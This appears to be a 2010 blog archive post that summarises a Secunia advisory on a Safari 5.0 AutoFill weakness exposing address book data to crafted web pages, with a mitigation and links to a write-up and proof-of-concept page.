Archive

Archive for July, 2010

0day: Apple Safari AutoFill

Description

Jeremiah Grossman has discovered a weakness in Apple Safari, which can be exploited by malicious people to disclose potentially sensitive information.

The weakness is caused due to the AutoFill feature being enabled to use information from the personal address book card by default. This can be exploited to secretly disclose personal information from the personal address book card when a user visits a specially crafted web page.

The weakness is confirmed in Safari version 5.0. Other versions may also be affected.

Impact :  Exposure of sensitive information

Reference : Secunia Advisory SA40664

Solution
Disable the AutoFill feature for address book card information.

How? Show Safari preferences (press Command-comma or ⌘,) and uncheck the autofill web form.

Further reading:

http://jeremiahgrossman.blogspot.com/2010/07/i-know-who-your-name-where-you-work-and.html

PoC : http://ha.ckers.org/weird/safari_autofill.html

Personal information exposed?   It depends on the data, here’s my browser result.